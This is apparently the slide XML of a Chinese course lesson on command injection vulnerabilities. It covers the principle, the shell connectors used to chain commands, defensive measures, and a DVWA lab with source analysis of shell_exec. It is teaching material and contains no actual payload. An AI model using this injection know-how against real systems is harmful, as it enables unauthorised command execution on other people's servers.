              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>掌握命令执行漏洞的利用。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>了解命令执行漏洞的防范措施。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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【任务分析】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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内容占位符 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1825625"/>
            <a:ext cx="10800000" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>命令执行漏洞，也称命令注入漏洞，是攻击者可以随意执行系统命令，它属于高危漏洞之一。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>本任务介绍命令执行漏洞、分析命令执行漏洞代码，讲解命令执行漏洞的利用方法，介绍防范命令执行漏洞的措施。</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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 -2147482487"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect b="44324"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1564005" y="2730500"/>
            <a:ext cx="9098280" cy="3340735"/>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6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="499110" y="1320165"/>
            <a:ext cx="11012170" cy="1274445"/>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4、出扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>报告</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin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cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）点击左侧Report模块，在Download项，可以选择PDF格式或HTML格式进行下载。这里我们选择HTML格式，即双击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“HTML”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>按钮。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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00" y="1884680"/>
            <a:ext cx="10800000" cy="4728845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" marR="0" algn="just">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一、命令执行漏洞的原理</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" algn="just">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>命令执行漏洞，也称命令注入漏洞，它允许攻击者在Web应用程序中执行未授权的系统命令。这种漏洞通常出现在Web应用程序处理用户输入时，未对输入数据进行充分的验证和过滤，从而使得攻击者能够通过特定的输入格式注入系统命令。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>二、常用的命令连接符</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" algn="just">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>命令连接符包括：&amp;、&amp;&amp;、|、||。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>三、命令执行漏洞的防御措施</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1、尽量不要使用命令执行函数。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2、客户端提交的变量在进入执行命令函数前要做好过滤和检测。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3、在使用动态函数之前，确保使用的函数是指定的函数之一。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4、对PHP语言来说，不能完全控制的危险函数最好不要使用。</a:t>
            </a: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20" name="文本框 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720090" y="1828165"/>
            <a:ext cx="10800080" cy="2295525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" marR="0" indent="266700" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>我们将利用DVWA平台上的命令执行漏洞来执行系统命令。本节的学习任务分为两部分：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="1" indent="266700" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一、low级别的命令执行漏洞利用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="1" indent="266700" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>二、分析medium、high和impossible级别的命令执行源代码。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:effectLst/>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5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="751840" y="1828165"/>
            <a:ext cx="10800080" cy="191389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在Web服务服上安装了DVWA平台。访问地址：http://192.168.1.201/dvwa/。</a:t>
            </a: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表格 5"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="855980" y="2304000"/>
          <a:ext cx="10558145" cy="995680"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1000125"/>
                <a:gridCol w="3966210"/>
                <a:gridCol w="2205355"/>
                <a:gridCol w="3386455"/>
              </a:tblGrid>
              <a:tr h="367665">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>编号</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操作系统</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用途</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Web服务器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80" cy="122174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400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>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这里提供了Ping IP地址，并将Ping命令的执行过程显示出来。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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278800" y="2505075"/>
            <a:ext cx="7560000" cy="3393267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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5245"/>
            <a:ext cx="10800080" cy="89217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800" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>测试：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>127.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。点击</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Submit</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按钮。</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以正常连接。</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916000" y="2328545"/>
            <a:ext cx="6372225" cy="2886075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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4800"/>
            <a:ext cx="10800080" cy="4654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、查看源代码</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2147482571"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3456000" y="1914525"/>
            <a:ext cx="5292725" cy="3933190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3"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4610"/>
            <a:ext cx="10800080" cy="501523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、源代码分析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>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① php_uname函数的功能：返回运行PHP的系统的有关信息。参数‘s’是返回操作系统名称。</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hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>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② stristr函数的功能：搜索字符串在另一字符串中的第一次出现。返回字符串的剩余部分（从匹配点）。如果未找到所搜索的字符串，则返回 FALSE。</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hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>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③ shell_exec函数的功能：可以执行任何在命令行中可以运行的命令。并且返回命令的输出。</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hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
